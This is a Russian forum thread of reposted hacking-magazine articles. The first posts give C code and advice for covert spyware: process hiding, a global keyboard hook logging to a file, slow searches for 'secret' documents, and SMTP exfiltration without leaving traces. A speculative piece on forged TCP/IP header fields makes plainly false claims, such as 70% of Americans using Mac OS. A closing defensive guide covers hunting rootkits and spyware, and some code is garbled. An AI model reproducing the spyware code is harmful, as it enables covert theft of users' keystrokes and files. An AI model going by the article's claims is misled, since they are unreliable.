РУСБОЙ. ПЕРВОПРИНЦИП-СИСТЕМ@СИСТЕМА-ПЕРВОПРИНЦИПА. ОСЬМАВА. СТИЛИ. ЖИЗНИ. СПЕЦНАЗ. ИНФОПОРТАЛ-ФОРУМ
http://rusboj.maxbb.ru/

Государственная тайна
http://rusboj.maxbb.ru/topic71.html
Страница 2 из 2

Автор:  Ангел [ 26-03, 00:48 ]
Заголовок сообщения: 

Добыча документов

С помощью технологии COM достаточно легко получить доступ к документу MS Office. Правда, сделать это на языке C++ весьма сложно, написать дополнительный компонент .NET или VB, будет вызываться из основной программы. Дело в том, что в заголовке любого окна MS Office отражается имя документа - остается просто найти этот файл в закромах пользователя.

Полезные инструменты

ТИП: WWW

www.safety-lab.ru

www.securitylab.ru/analytics/216398.php

www.zlib.net

www.rsdn.ru/Forum/Message.aspx?mid=696284&only=1

Автозапуск

ТИП: WWW

www.osp.ru/win2000/2003/01/060.htm

msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthn/security/winlogon_and_gina.asp

Теория и практика пряток

ТИП: WWW

http://subscribe.ru/archive/comp.soft.p ... 658.html#4

www.securitylab.ru/contest/212106.php

www.wasm.ru/article.php?article=1021007#p2_6_3

www.wasm.ru/article.php?article=hiddndt

Summary

Настоящие Веб-КР не работают в одиночку: кто-то контролирует их из центра, другие агенты страхуют от провалов, для имитации реальных существуют подсадные утки, дезинформирующие противника, маскируют свою деятельность под деятельность добропорядочных граждан. Идеально не оставлять улик (записей в реестре, непонятных процессов в диспетчере задач, файлов на диске и странных диагностических сообщений пользователю). Его работоспособность контролируют другие агенты, страхующие его от провала (записывать информацию об автозапуске перед завершением работы). Передача должна происходить напрямую через сервер SMTP, причем, если это внутренний сервер локальной сети, то чтобы письма имели приличный внешний вид.

Листинг "Поиск процесса по имени"

ТИП: Листинг

#include gt;

#include gt;

//pName – имя искомого процесса

//Возвращает true, если такой процесс запущен, и false в противном случае

bool IsProcessRunning( char * pName )

{

strlwr( pName );

HANDLE snapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

PROCESSENTRY32 pe;

char pExeName[256];

for( BOOL r=Process32First(snapshot, &pe); r; r=Process32Next(snapshot, &pe) )

{

strcpy(pExeName, pe.szExeFile);

strlwr(pExeName);

if( std::string(pName)==pExeName )

{

CloseHandle(snapshot);

return true;

}

}

CloseHandle(snapshot);

return false;

}

ТИП: Листинг

//Прототип функции HideProcess из NtHide

typedef BOOL (CALLBACK* tNTHIDE)( HWND hwnd );

tNTHIDE ntHide;

//Создаем окно без стиля WS_VISIBLE

gHWnd = CreateWindowEx (0, "Spy", "Spy", WS_POPUP | WS_THICKFRAME, 0, 0, 100, 100, NULL, NULL, hInstance, 0);

//Динамически подгружаем библиотеку NtHide

HMODULE module = LoadLibrary("nthide.dll");

ntHide = (tNTHIDE)GetProcAddress( module, "HideProcess" );

//Прячем процесс

ntHide( gHWnd );

//Устанавливаем хук

InstallHook( gHWnd, WM_HOOKED_CHAR );

// Цикл сообщений

while (GetMessage(&msg, NULL, 0, 0))

{

HWND currentHWnd;

currentHWnd = GetForegroundWindow();

if( currentHWnd!=gActiveWnd )

{

gActiveWnd = currentHWnd;

FILE * file = fopen("keyboard.log","a");

char str[256];

GetWindowText( gActiveWnd, str, 256 );

fprintf( file, "\n[%s]\n", str );

fclose(file);

}

DispatchMessage(&msg);

}

//Убираем хук

UninstallHook();

Листинг "Постановка хуков"

ТИП: Листинг

//Устанавливает хук

//hWnd - дескриптор окна управляющего приложения

//InterceptMsg – сообщение, которое будет посылаться управляющему окну по приходу перехватываемого сообщения

bool InstallHook (HWND hWnd, UINT InterceptMsg)

{

if (hWnd == NULL)

return false;

//Запоминаем дескриптор окна управляющего приложения

gParentWnd = hWnd;

gInterceptMessage = InterceptMsg;

//Устанавливаем хук

gMsgHook= SetWindowsHookEx( WH_GETMESSAGE, KeyboardMsgProc, gInstance, 0 );

//Если не удалось установить хук, то возвращаем ошибку

if (gMsgHook == NULL)

return false;

return true;

};

//Убирает ранее установленный хук

bool UninstallHook()

{

//Удаляем хук

UnhookWindowsHookEx (gMsgHook);

gMsgHook = 0;

return true;

};

"Поиск файлов"

HANDLE searchContext;

WIN32_FIND_DATA findData;

searchContext = FindFirstFile( "C:\\Мои документы\\*Секрет*.doc", &findData);

while( FindNextFile( searchContext, &findData ) )

{

//В переменой findData.cFileName мы имеем полное имя и путь искомого файла

//Ставим задержку, чтобы пользователь не заметил активного "шуршания" диска

Sleep(1);

}

FindClose( searchContext )

Автор:  Ангел [ 26-03, 00:49 ]
Заголовок сообщения: 

Постановка хуков

ТИП: WWW

www.rsdn.ru/summary/292.xml

www.uinc.ru/articles/zametki/001.shtml

msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks.asp

Передача информации

ТИП: WWW

www.rsdn.ru/summary/556.xml

www.codeguru.com/Cpp/I-N/internet/email ... .php/c6213

Техника создания DLL для автозагрузки подробно описана в MSDN. Thanks fellows.

Для сокрытия процесса диспетчера задач мы должны перехватить вызов метода NtQuerySystemInformation.Фильтрующая функция глобального хука может вызываться из адресного пространства каждого процесса. Электронную почту можно отправлять даже с помощью обычного клиента telnet. С помощью технологии COM ты достаточно легко можешь получить доступ к загруженному в любой компонент документу MS Office. не оставлять улик: записей в реестре, непонятных процессов в диспетчере задач, файлов на диске и странных диагностических сообщений пользователю. Работоспособность идеально должны контролировать другие агенты, страхующие его от провала (записывать информацию об автозапуске перед завершением работы). Передача пользовательских документов должна происходить напрямую через сервер SMTP.

Автор:  Ангел [ 26-03, 00:54 ]
Заголовок сообщения: 

Охота на КАИНа

payhash[Wolf D.A.]

Спецвыпуск: Хакер, номер #060, стр. 060-064-1


--------------------------------------------------------------------------------

aka acidoptic

Не поможет антивирус, не поможет файрвол?

"Концепция межсетевого экрана (МСЭ) все еще представляется в виде непроницаемой кирпичной стены, непобедимого магического защитника всего хорошего. Реклама современных производителей только подчеркивает это, обещая полную автоматизированную защиту, стену, способную блокировать все опасности еще на стадии их возникновения, используя алгоритмы, еще два года назад, возможно, и не существовавшие. Но что если на самом деле МСЭ - это не стена, а всего лишь соломенная ширма?"

Израэль Дж. Луго и Дон Паркер, перевод Владимира Куксенко

"Ты думаешь, инженерный пароль? Нет, брат, сомневаюсь. Иначе бы поснифали telnet. Странно. Как это им удалось? В принципе, snort показал пакетную активность, но это был не telnet (не уровень приложений)". Я услышал этот диалог три года назад, но помню его как сейчас, и много разных мыслей приходит в мою голову.

В конце 60-х по заявке вооруженных сил США и под их чутким руководством был спроектирован и смоделирован проект ARPA (RFC 384). Если рассказать о нем в двух словах :), получится, что сеть компьютеров объединена в один логический механизм, и если какую-то часть данного механизма вывести из строя, в целом система не обломится. Все довольны, идея просто замечательна. В результате после недолгих и красивых убеждений ее принял весь мир. Но мир не учел лишь то, что под маской качества и стабильности притаился старший брат - КАИН (Control Authonomical-Informations Networks). Те, кто читают эту статью, наверняка знают такие аббревиатуры, как TCP (UDP)/IP, ICMP. В этих нестрашных буквосочетаниях мы и попробуем найти скрытую угрозу.

Голова профессора Доуэля

Для начала в деталях разберем сетевой стек IP (RFC 791) (смотрим "Схему 1").

Если применить его относительно языка С, получим следующую несложную структуру:

struct ip {

u_int8_t ip_vhl; //Версия и размер сетевого стека

#define IP_V(ip) (((ip)->gt; ip_vhl & 0xf0) >gt; >gt; 4)

#define IP_HL(ip) ((ip)->gt; ip_vhl & 0x0f)

u_int8_t ip_tos; //TOS приоритет IP-пакета

u_int16_t ip_len; //Размер IP-пакета

u_int16_t ip_id; //Идентификатор IP-пакета

u_int16_t ip_off; //Офсет IP-пакета в случае его фрагментации

#define IP_DF 0x4000

#define IP_MF 0x2000

#define IP_OFFMASK 0x01fff

u_int8_t ip_ttl; //Время жизни IP-пакета

u_int8_t ip_p; //IP-протокол

u_int16_t ip_sum; //Контрольная сумма IP-пакета

struct in_addr ip_src, ip_dst; //IP-адрес источника и IP-адрес получателя

};

В пакете существуют как обязательные поля, которые нужно грамотно заполнить, так и необязательные - их можно не заполнять (например data 64 Кб). Теперь подумаем о том, что можно записать в эти 64 Кб. Обычно в них пишутся протоколы более высокого транспортного уровня, которые описаны в RFC (TCP, UDP, etc). Основной принцип таких протоколов - это работа с портами. Например, на хост-получатель пришел IP-пакет, а что делать с этим пакетом и как поступить с ним, определяется именно в этом поле. Данными процедурами занимается ядро операционной системы (запомним этот важный факт ;)). Ядро принимает входящие пакеты, обрабатывает их и отдает приложениям (WEB, FTP, SSHD, TELNETD и др.), создавая сетевые сессии, которые можно отслеживать с помощью различных утилит (netstat, sockstat, etc). Как уже было сказано, эти сессии более высокого сетевого уровня, и их можно отследить стандартными способами. Более низкий уровень (Ethernet, IP, ICMP и др.) отслеживается на уровне ядра, доступ к таким сессиям осуществляется через специальные системные вызовы. По такому принципу работают файрволы (firewall) и сетевые сниферы. При определенной конфигурации файрвол защищает систему от нежелательной сетевой сессии. Проще говоря, с его помощью мы запрещаем или разрешаем тот или иной протокол. Все просто! Все защищены, все довольны, на первый взгляд все кажется правильным и логичным, но есть одно "но". Попробуем подумать немного не так, как принято в обществе :), и решить нижеследующую задачу.Допустим, на хост пришел UDPIP-пакет. На хосте, куда пришел пакет, настроен файрвол, который запрещает UDP-протокол. Обработает ли ОС такой пакет, и как она поступит с ним?

Да, действительно, такой пакет обработается ядром: сначала пакет помещается в область памяти, затем ядро проверяет, какие правила есть для такого типа пакета. Если тип пакета запрещен, он просто удаляется из памяти.

Теперь решим такую задачу: файрвол настроен так, что он запрещает все, кроме определенных портов. Опять же, если придет другой тип пакета, он в любом случае обработается ядром (пакет уже попал в операционную систему). Теперь для нас стало ясно, зачем пишутся и продаются ОС с закрытым кодом ядра :). Ты уверен, что твоя ОС с закрытым кодом ядра надежна? Да? Поздравляю. На самом деле никто не может дать гарантии того, что ОС с закрытым кодом ядра в определенное время не сможет сделать того, что ей не положено.

Как я уже сказал, в сетевом стеке IP/TCP (UDP) есть необязательные поля (имеется в виду, что в этих полях может содержаться любое значение этого типа), такие как ip_id, ip_tos, ip_offset. ОС в любом случае получит такой пакет и обработает его. Можно, конечно, возразить, что эти поля очень малы и в них невозможно записать много зловредной информации? А зачем записывать много? Сколько можно скомбинировать секретных команд в 8 бит? Правильно, 256 - не так уж и мало. Ядро получило пакет с определенным номером команды, которое, например, содержится в поле TOS. И тут – бац! - сгорела наша "мать", процессор, винчестер или завелся пользователь с нужными привилегиями ;). Всем стало весело.

Теперь пришла пора привести некоторые доказательства моим словам – рассмотрим программу, которая будет слушать сетевой трафик и при получении определенного пакета IP создаст пользователя с правами Administrator.

Усложним задачу, настроив в системе файрвол (OUTPOST или Kerio) и убедимся в их бесполезности в случае непредвиденных ситуаций ;). Разбирать весь код программы не будем, я заострю твое внимание на определенных моментах. Первое, что нужно написать, - это сетевой анализатор. Способ работы с RAW-сокетами выберем по вкусу: ws2_32, Berkley sockets, LIBPCAP etc. Так как 80% населения нашей страны использует ОС Windows[XY], а эта статья посвящена использованию операционных систем с закрытым кодом, будем использовать ws2_32.lib.Работа с RAW-сокетами ws2_32.lib мало отличается от работы POSIX RAW-стандарта.

Представим, что мы - крупная контора, которая по спецзаказу определенных силовых структур написала ОС с закрытым кодом, в ядре которой реализована обработка IP-пакета, в котором смотрится поле TOS (к примеру, для того чтобы совершить деструктивные действия, в пакете IP поля TOS содержится число 33 dec.).

Примерно вот так выглядела бы программа для отсылки деструктивного командного IP-пакета:

#include gt;

#include gt;

#include gt;

#define SRCADDR "127.0.0.1"

#define DSTADDR "127.0.0.1"

typedef struct ip

{

/*

Здесь описываем IP-структуру:

*/

}IPHEADER;

USHORT checksum(USHORT *buffer, int size)

{

unsigned long cksum=0;

/*

Здесь считаем контрольную сумму IP-пакета:

*/

return (USHORT)(~cksum);

}

//Функция по сборке IP-пакета

static u_char *constructpacket(u_char *inetfragment, struct in_addr srcaddr,

struct in_addr dstaddr, u_short dstport);

static IPHEADER ippkt;

static char tcpip[60]={0};

int main()

{

/*

Объявляем переменные для работы с RAW-сокетом.

*/

WSADATA WSAData;

SOCKET skt;

SOCKADDR_IN addr_in;

struct in_addr srcaddr, dstaddr;

WORD dstport;

/*Подготавливаем RAW-сокет, переводя его в различные режимы

skt=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,

WSA_FLAG_OVERLAPPED);

setsockopt(skt,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag);

nTimeOver=1000;

if (setsockopt(skt, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR)

{

printf("setsockopt SO_SNDTIMEO error!\n");

return false;

}

addr_in.sin_family=AF_INET;

addr_in.sin_addr.S_un.S_addr=inet_addr(DSTADDR);

//Формируем IP-пакет

constructpacket(inetfragment, srcaddr, dstaddr, dstport);

//Пишем пакет в RAW-сокет

rect=sendto(skt, inetfragment, sizeof(ippkt),0,

(struct sockaddr*)&addr_in, sizeof(addr_in));

closesocket(skt);

WSACleanup();

return 0;

}

//Описание функции по сборке пакета

static u_char *constructpacket(u_char *inetfragment, struct in_addr srcaddr,

struct in_addr dstaddr, u_short dstport)

{

// Заполняем IP-структуру

ippkt.ip_vhl=(4

ippkt.ip_tos=0x21; //Здесь можем подделать TOS, к примеру, поставив значение 33

ippkt.ip_len=htons(sizeof(struct ip ));

ippkt.ip_id=1;

ippkt.ip_off=0;

ippkt.ip_ttl=128;

ippkt.ip_p=IPPROTO_TCP;

ippkt.ip_sum=0;

ippkt.ip_src=srcaddr;

ippkt.ip_dst=dstaddr;

//Считаем контрольную сумму IP-пакета

memcpy(tcpip, &ippkt, sizeof(ippkt));

memset(tcpip+sizeof(ippkt), 0, 4);

ippkt.ip_sum=checksum((USHORT *)tcpip, sizeof(ippkt));

memcpy(tcpip, &ippkt, sizeof(ippkt));

//Копируем данные из IP-буфера в буфер, который будем передавать в Сеть

memset(inetfragment, 0, sizeof(struct br0_ip));

memcpy(inetfragment, tcpip, sizeof(struct br0_ip));

return inetfragment;

}

А на стороне жертвы в ядре стоит примерно такой обработчик на наличие командного пакета:
while(rec=rcvfrom(IPbuf, /etc/))

{

// вырезано

ippkt = (struct ip *)Ipbuf;

// вырезано

// И вот сам КАИН для данного обработчика.

If(ippkt.ip_tos == 33) {system();}

// Остальные правила хода обработки, которые нас мало интересуют.

}

Вот она - скрытая угроза. Проверить бесполезность файрволов в этом случае можно даже не пробуждая в себе навыки программирования :). Для примера запустим какой-нибудь файрвол и настроим его так, чтобы он запрещал любой протокол любого уровня.

Смотрим на картинку и видим, что происходит на ней:

И параллельно запустим какой-нибудь снифер (snort, Iris):

С другой машины попробуем подключиться к этой зафайрволенной машине любым коннектором (telnet, ssh, ftp) и увидим, как сетевой пакет заблокируется файрволом, но одновременно он придет на снифер (теперь понятно, чем чревато все это?).

Думай?

Конечно, наука нестандартного мышления доступна не всем :), но по-настоящему глупо не задумываться о таких элементарных вещах, как недреманное око большого брата. Только маразматик станет поднимать ОС с закрытым кодом в виде маршрутизаторов, серверов и пультовых систем управления.

Можно еще долго рассуждать о недостатках протокола Ethernet/IP/ TCP/UDP etc. и об ОС с закрытым кодом. Но что же делать? Сидеть дома и ни в коем случае не выходить на улицу, компьютер к Сети не подключать. Не нравится? Решение очень простое - использовать системы с открытым исходным кодом и вообще отечественную продукцию вместо забугорных CISCO, Windows etc. (пусть сами с ними мучаются :)).

Многие улыбнутся и спросят: "А разве существует эта самая отечественная продукция?" Да, такие девайсы есть - и рабочие платформы, и системы маршрутизирования. О некоторых из них, наверное, слышали все, но даже не догадывались, что это отечественные продукты. ASPLinux, Frenzy – это для рабочих станций. Альтернативу CISCO и другим забугорным маршрутизаторам можно представить, например, таким девайсом, как "КОНТИНЕНТ" (построен на ядре FreeBSD).

Кстати, несмотря на то, что Linux, FreeBSD, etc - не отечественные продукты, в разработке их ядер участвует весь мир свободно мыслящих и независимых уберкодеров, поэтому их можно считать достижением разумного человечества в целом :). Кстати, есть данные, что 70% американцев используют MAC OS как операционную систему (фактически это родственник FreeBSD). Почему тогда мы сами используем то, что нам навязывают они, а те, кто навязывают их, сами не пользуются ими? Потому что это проще или удобнее? Но какую плату мы можем получить за это? Никто не знает, остается только догадываться.

К большому сожалению, многие отечественные IT-разработки строго засекречены и используются в военной индустрии. Давно известно, что у нас есть процессоры, опережающие своих современников Intel, AMD, Alpha и др. (недаром наша военная техника лучшая в мире). Я не говорю об отечественных программных продуктах, которые могли бы дать фору большинству зарубежных программ. Как много времени должно пройти, чтобы наши военные разработки стали достоянием общественности, и станет ли оно когда-либо открытым? Однако достаточно лирики :). Перейдем ко второй части нашего параноидального марлезонского балета.Mambo number two

Рассмотрим еще одну интересную деталь в стеке TCP (RFC 793). Стек tcp, уже знакомый нам по модели OSI, находится выше стека IP. Посмотрим на схему 2.

На языке С это можно представить в виде такой структуры:

struct br0_tcphdr {

WORD th_sport; //Порт источник

WORD th_dport; //Порт получения

DWORD th_seq; //(КАИН)

DWORD th_ack; //(КАИН)

BYTE th_lenres; //(КАИН)

BYTE th_flags //Тип TCP-фрагмента (КАИН)

#define TH_FIN 0x01

#define TH_SYN 0x02

#define TH_RST 0x04

#define TH_PUSH 0x08

#define TH_ACK 0x10

#define TH_URG 0x20

#define TH_ECE 0x40

#define TH_CWR 0x80

#define TH_FLAGS (TH_FIN|TH_SYN|TH_RST|TH_PUSH|TH_ACK|TH_URG|TH_ECE|TH_CWR)

u_short th_win; //Размер TCP-фрейма

u_short th_sum; // Контрольная сумма TCP-пакета

u_short th_urp;

};

В данном случае в полях DWORD th_seq; DWORD th_ack; могут содержаться любые данные (см. рисунок). В сумме эти поля дают 8 байт, а это уже, извините, 8x8 = 64 бит, что не так уж и мало для дифференциальных инструкций. Играя смещениями битов, можно получить множество команд или две инструкции для 32-разрядного процессора.

Если сформировать SYN-пакет и отправить его на любой другой хост, на хосте-получателе можно будет наблюдать следующую картину дампа SYN-пакета, в котором подделаны значения Seq и Ack. Также мы видим, что ядро нисколько не обратило внимание на эту "мелочь".

В принципе, если в поле BYTE th_flag будет содержаться значение, отличное от принятого в стандарте (имеются в виду значения TH_FIN, TH_SYN, TH_RST, TH_PUSH, TH_ACK, TH_URG, TH_ECE, TH_CWR, TH_FLAGS (интересно, а неофициальных сколько? =)), пакет все равно будет доставлен на хост-получатель, а ядро само решит, что делать с ним ;). Если просуммировать разряды полей BYTE th_lenres, BYTE th_flags и u_short th win, получим еще оду 32-х разрядную инструкцию. В таком случае наш TCP-пакет может содержать три 32-х разрядные инструкции. С переходом на 64-разрядные архитектуры мы получим одну 64-разрядную инструкцию. Однако на этом наше публичное вскрытие не закончится. Мы присмотримся к структуре TCP еще пристальнее и увидим интересную вещь:

WORD th_sport; //Порт источник

WORD th_dport; //Порт получения

Все, что будет содержаться в этих полях, есть число не больше 65535. Соответственно, в этих полях может содержаться любое число не больше 65535. Объединив разряды этих двух полей, получим еще одно место под 32-разрядную инструкцию.

Подделав поля th_sport и th_dport (порт источник, порт назначения) как показано на рисунке, отправим SYN-запрос, а на машине, куда будем отправлять пакет, запустим утилиту tcpbump и увидим вот такую картину:

Как видим, система приняла такой пакет (и не подавилась даже ;)) и ответила флагом [R]eset, так как порт не прослушивается. Но все же система обработала такой пакет.

Итак, у нас имеется место под четыре 32- и две 64-битные свободные инструкции. Получились интересные четные числа (4x32 и 2x64), а при переходе на 128-разрядные платформы получим одну 128-разрядную инструкцию. В недалеком будущем нас ждет переход на стандарт IPv6, поэтому никто от этого ничего не теряет, все запланировано на несколько лет вперед ;).Существуют ли в процессоре недокументированные деструктивные, злые и подлые инструкции? Что ждет нас в будущем? Вряд ли удастся получить ответы :).


Большое спасибо Лозовскому Александру aka Dr.Klouniz и Кузнецову Володе aka smith за их помощь.

Редакция напоминает, что мнение автора не всегда совпадает с мнением редакции. В свою очередь, мнение редакции может не совпадать ни с чем, кроме мнения редакции :).

Автор:  Ангел [ 26-03, 00:59 ]
Заголовок сообщения: 

Компьютерный СМЕРШ

Зайцев Олег (z-oleg.com/secur)

Спецвыпуск: Хакер, номер #060, стр. 060-070-1


--------------------------------------------------------------------------------

Находим и уничтожаем врагов народа без помощи спецслужб

Начиная разговор об охоте на шпионское ПО, сразу откажемся от типовых решений наподобие "проверить антивирусом", "пролечить антиспайвером", поставить заплатки и файрвол, поскольку эта тактика очевидна и нет смысла обсуждать ее. Более того, моя практика показывает, что антивирусы и антишпионы не обеспечивают 100% детектирования и, наверное, никогда не гарантируют чистки. Самый надежный метод чистки - вручную.

Поиск руткитов

Охоту на современные шпионы и трояны необходимо начинать с антируткита. Причина проста: вредоносные перехватчики API делают бессмысленным поиск файлов на диске, процессов в памяти; в плане анализа реестра тот же HackerDefender маскирует и свои процессы, и ключи в реестре, и файлы на диске, и много еще чего. Бороться с руткитом можно либо загрузкой с чистого диска (здесь руткит бессилен), либо применением различных утилит-анализаторов. Идеального и универсального средства против всех возможных руткитов нет и, вероятно, никогда не будет - технологии руткитов тоже не стоят на месте, поэтому чем больше утилит в арсенале, тем лучше. Моя практика дает мне основания рекомендовать три программы: AVZ (он показывает перехваты и дает пищу для размышления), Rootkit Revealer от SysInternals (читает диск/реестр через API и напрямую, сравнивает результаты, находя маскирующихся зверей) и BackLite от F-Secure (есть ряд интересных технологий поиска маскирующихся процессов, в частности, он эффективно ловит FU Rootkit). По всем трем программам можно сказать, что ложные срабатывания неизбежны. Если антируткит умеет выдавать информацию о том, какие функции перехвачены, то можно выделить ряд функций, которые чаще всего перехватываются именно руткитами.

Самым распространенным из UserMode-руткитов является HackDef. Его исходники открыты, поэтому в интернете гуляют сотни его клонов, и их отличия от HackDef минимальны с точки зрения перехватываемых функций. В расшифровке протоколов и изучении самих руткитов хорошим подспорьем является книга Гарри Неббета "Справочник по базовым функциям API Window NT/2000" и отладчик для оперативного изучения машинного кода перехваченных функций.

В процессе охоты на руткиты не следует забывать, что замаскировать процесс можно и без перехвата функций API - для этого достаточно модифицировать системный список EPROCESS, удалив из него запись для маскируемого процесса (сделать это просто: каждая запись EPROCESS содержит ссылки на предыдущую и последующую, поэтому удаление элемента N сводится к модификации ссылок элементов N-1 и N+1). По такой методике работает FU и его аналоги, обнаружение возможно при помощи утилиты BlackLite от F-Secure.

Анализ запущенных процессов

Анализ запущенных процессов является, по сути, самой простой операцией, поэтому рассматривать ее подробно нет смысла. Главная задача - найти все подозрительные процессы и выяснить, что это такое и для чего необходимо. Для выполнения этой задачи удобны утилиты от Sysinternals (они умеют проверять цифровую подпись MS) и AVZ (содержит базу безопасных файлов, упрощающую анализ). Для экспресс-проверки подозрительных файлов можно порекомендовать http://virusscan.jotti.org и www.virustotal.com - это сайты онлайн-проверки файла множеством антивирусов.Неубиваемые процессы must die

Однако найти подозрительный процесс – еще не все. Иногда оказывается, что злобный процесс пытается защищаться от пользователя. Существует несколько методов защиты от убиения процессов. Для начала рассмотрим самый простой метод, применяемый в SpyWare WinAd и его клонах. Как и все гениальное, идея этого метода подразумевает, что вредоносная программа состоит не из одного, а из двух исполняемых файлов. При запуске одного из них автоматически запускается второй. Затем во время работы процессы следят друг за другом, и если завершить процесс A, то процесс B немедленно перезапустит его (и, соответственно, наоборот). Убить такие процессы поштучно сложно, так как для этого нужно остановить оба процесса, а затем прибить их. Удобнее всего сделать это из программы ProcessExplorer от Sysinternals.

Второй метод "неубиваемости" несколько сложнее. Вместо второго процесса применяется поток, созданный в системном процессе, чаще всего - в Explorer.exe. Поток следит за процессом SpyWare и перезапускает процесс в случае необходимости. Для обнаружения такого вредоносного потока можно применить ProcessExplorer от SysInternals, для анализа - отладчик OllyDBG (он не требует инсталляции, что очень удобно в полевых условиях). Есть аналогичные варианты, в которых вместо потока применяется DLL, прописанная, скажем, как элемент Winlogon - задачей такой DLL является перезапуск процессов и защита файлов путем их открытия с монопольным доступом.

Третий метод, еще более сложный, предполагает перехват API-функции OpenProcess и тем самым блокирует все посягательства на защищаемый процесс. Естественно, прибить такой процесс можно только после нейтрализации или обхода перехватчика.

Неудаляемые файлы

Как и в случае с удалением процессов, многие SpyWare отчаянно защищают свои файлы от удаления, для этого чаще всего применяются вот эти три методики:

1. Открытие файла на монопольный доступ. Эту операцию может выполнить второй процесс "зверя", внедренная им в какой-либо процесс библиотека или поток. Для поимки такого "блокиратора" достаточно при помощи ProcessExplorer или его аналогов посмотреть, какой процесс держит открытым интересный тебе файл.

2. Восстановление файла после удаления. Первый метод слишком заметен, поскольку после неудачных попыток стирания файла можно в конце концов загрузиться с CD-диска и прибить файл. Более хитрой является методика восстановления файла, при которой никто не мешает стереть зверя (пользователь и антивирусы думают, что успешно удалили его, а тот через некоторое время "оживает"). SpyWare чаще всего применяют два метода: отложенное переименование и троянский поток. При отложенном удалении при помощи секции [rename] файла wininit.ini для Win9x или функции MoveFileEx с флагом MOVEFILE_DELAY_UNTIL_REBOOT настраивается отложенное переименование/перемещение файла (естественно, для этого где-то на диске хранится копия SpyWare). Следовательно, если такой SpyWare находится в папке автозапуска, то в момент старта он создает свою копию, настраивает отложенное переименование и никак не препятствует своему удалению.Другой метод самовосстановления немного сложнее и применяется, в частности, для защиты компоненты SpyWare.BetterInternet с именем nail.exe. Этот самый nail (кстати, nail в переводе – "гвоздь", "пригвоздить") создает в explorer.exe пару своих потоков. У потоков имеется буфер, хранящий в себе nail.exe (он небольшой по размеру). Потоки с некоторой периодичностью проверяют, есть ли этот файл на диске, и если нет, то создают его. Как говорится, просто и эффективно. Убийство этого файла осуществляется всего-то после загрузки с системного диска или остановки/удаления потоков, отвечающих за восстановление файла (причем проще прибить процесс explorer.exe, а не искать в нем левые потоки).

3. RootKit-принцип - перехват нескольких функций для маскировки файла или блокирования операций с ним.

Автозапуск

После разбора процессов следующий шаг - это анализ автозапуска. Про стандартные виды автозапуска до меня говорили и писали сотни раз, так что стоит вспомнить лишь несколько нестандартных методов.

Расширения Winlogon (Winlogon Notify)

Этот метод очень популярен среди современных троянских программ и некоторых SpyWare (из применяющих такую технологию SpyWare наиболее мерзопакостным является Look2me, который, кроме того, известен множеством модификаций). Их регистрация производится в ключе Software\Microsoft\Windows NT\CurrentVersion\Winlogon.

Расширения проводника

Расширения проводника загружаются процессом explorer.exe и применяются как plugin для увеличения количества его функций. Естественно, такой метод может применяться для запуска вредоносной DLL. Так как модулей расширения множество (у меня на XP их обнаружилось 186 штук), среди них непросто обнаружить один-два троянских. В данной ситуации могут помочь утилиты, которые отсеивают безопасные файлы на основании цифровой подписи MS или собственной базы безопасных файлов. В случае анализа вручную нужно изучить ключ реестра SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved, для каждого модуля расширения там указан CLSID и смысловое имя модуля.

Скрипты в элементах рабочего стола и файлах, управляющих внешним видом папки

Этот метод применяют SpyWare, трояны и вирусы. Идея метода проста: рабочий стол может содержать web-элементы, являющиеся полноценными html-страницами (со скриптами и прочими элементами расширения), так что этим можно активно пользоваться. Простейший пример - встраивание в рабочий стол невидимой web-страницы, которая при помощи скрипта периодически выводит рекламу. Идея оригинальна тем, при использовании этого метода в памяти отсутствуют посторонние процессы и DLL и в автозапуске отсутствует что-либо подозрительное. Аналогичный метод основан на модификации файлов, хранящих настройки вида папки, - проводник считывает эти настройки из файла desktop.ini, а из него, как правило, делается ссылка на HTA-скрипт, который в свою очередь выполняет некие вредоносные действия, например запускает некоторые программы. Один из примеров реализации этого метода есть в Email-Worm.Win32.Rays.Мониторы провайдеры системы печати

Регистрация монитора системы печати является новым словом для разработчиков SpyWare и троянов, так как стандартные утилиты анализа автозапуска не рассматривают монитор печати как элемент автозапуска. Не рассматривают очень зря, поскольку известен ряд шпионов, прописывающих себя монитором печати в ключ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print (далее ключи \Monitors и \Providers). Ничего сложного в создании такого gt; или gt; печати нет - они являются DLL, структура которой описана в MSDN.

BHO и Downloaded Program Files

Многие из известных SpyWare и AdWare прописываются как BHO для Internet Explorer. Это удобно, поскольку автоматически предоставляет контроль над браузером, обмен с Сетью идет из контекста IE и нет процесса, который бы мозолил глаза пользователю. Найти BHO достаточно просто: они прописываются в реестре, необходимо лишь проконтролировать ключи реестра Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects, SOFTWARE\Microsoft\Internet Explorer\Toolbar и Software\Microsoft\Internet Explorer\Extensions.

Кроме анализа, на эти ключи очень полезно установить права доступа, запретив их модификацию абсолютно всем, потому что установка BHO проводится не каждый день, а как мера защиты это не повредит.

В ходе охоты на BHO нужно учитывать два момента:

1. Разработчики SpyWare научились делать "BHO-невидимки", идея которых такова: стандартный BHO очень заметен, и для его обнаружения достаточно проверить перечисленные выше ключи реестра, а для этой нехитрой операции существуют сотни утилит. Но данные ключи проверяются IE только в момент его запуска, следовательно, SpyWare может создавать ключ реестра в момент запуска IE и уничтожать их сразу после загрузки BHO. Известно уже несколько SpyWare, применяющих похожую методику. Они динамически создают ключ, а некоторые внедряют для этих целей в IE свою DLL с перехватчиками. Чтобы не быть голословным, приведу классический пример - Trojan.Win32.Agent.fc. Он содержит библиотеку с именем jaaste.dll (размером 3 Кб), которая экспортирует две функции - Hook и UnHook. Данная DLL устанавливает Hook типа 5 (WH_CBT) и следит с его помощью за событиями создания/разрушения окон. При обнаружении события создания он регистрирует окна с классом "ieframe" в динамике BHO c CLSID {FB153DCE-822E-47ec-8D00-2706E7864B37}, а после инициализации IE - удаляет. Такие SpyWare ликвидируются отловом модификации указанных ключей реестра при помощи RegMon, при этом нужно не забыть "подразнить" перехватчик, несколько раз запустив и закрыв IE.

